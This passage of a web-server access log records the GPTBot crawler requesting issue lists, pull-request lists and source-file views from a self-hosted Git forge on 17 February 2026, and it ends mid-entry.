"/windpacer/windpacer/issues?assignee=1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10207] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&project=-1&state=closed&type=all" +[17/Feb/2026:19:39:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10031] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:39:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10214] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:39:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10188] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&project=-1&state=open&type=all" +[17/Feb/2026:19:39:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 9996] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:39:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10220] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:39:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10220] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:39:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9967] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:39:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10043] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:39:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10037] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:39:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 9983] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&project=-1&state=all&type=all" +[17/Feb/2026:19:39:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10156] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:39:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10178] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:39:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10008] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:39:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json?display=source" [Client 74.7.227.38] [Length 11366] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:19:39:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json?display=source" [Client 74.7.227.38] [Length 11364] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:19:39:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json?display=rendered" [Client 74.7.227.38] [Length 11155] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:19:39:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json?display=source" [Client 74.7.227.38] [Length 11365] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:19:39:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json?display=rendered" [Client 74.7.227.38] [Length 11156] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:19:39:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10067] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:19:39:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10060] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&project=-1&sort=oldest&state=open&type=all" +[17/Feb/2026:19:39:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10233] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&project=-1&sort=oldest&state=open&type=all" +[17/Feb/2026:19:39:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10061] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&project=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:19:39:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/install.sh?display=rendered" [Client 74.7.227.38] [Length 10918] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/install.sh" +[17/Feb/2026:19:39:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10028] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:39:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10206] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:39:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10184] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:39:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10015] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:39:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10189] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&state=closed&type=all" +[17/Feb/2026:19:39:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10027] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&state=closed&type=all" +[17/Feb/2026:19:39:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10165] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&state=open&type=all" +[17/Feb/2026:19:39:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/pip3.12?display=rendered" [Client 74.7.227.38] [Length 11218] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/pip3.12" +[17/Feb/2026:19:39:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt?display=rendered" [Client 74.7.227.38] [Length 10990] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt" +[17/Feb/2026:19:39:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt?display=rendered" [Client 74.7.227.38] [Length 10995] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt" +[17/Feb/2026:19:39:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt?display=rendered" [Client 74.7.227.38] [Length 10991] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt" +[17/Feb/2026:19:39:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt?display=rendered" [Client 74.7.227.38] [Length 10990] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt" +[17/Feb/2026:19:39:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt?display=rendered" [Client 74.7.227.38] [Length 10994] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt" +[17/Feb/2026:19:39:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10178] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?project=-1&sort=latest&state=closed&type=all" +[17/Feb/2026:19:39:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json?display=source" [Client 74.7.227.38] [Length 11365] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:19:39:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json?display=source" [Client 74.7.227.38] [Length 11364] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:19:39:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json?display=source" [Client 74.7.227.38] [Length 11365] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:19:39:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json?display=source" [Client 74.7.227.38] [Length 11364] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:19:39:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10000] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&project=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:19:39:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10028] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:39:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 9998] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&project=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:19:39:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10210] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:39:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10019] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:39:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10032] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:39:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10190] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:39:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10162] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:40:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 9989] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:19:40:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10016] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=oldest&state=open&type=all" +[17/Feb/2026:19:40:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9971] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&state=all&type=all" +[17/Feb/2026:19:40:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 9978] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&state=all&type=all" +[17/Feb/2026:19:40:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10234] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; 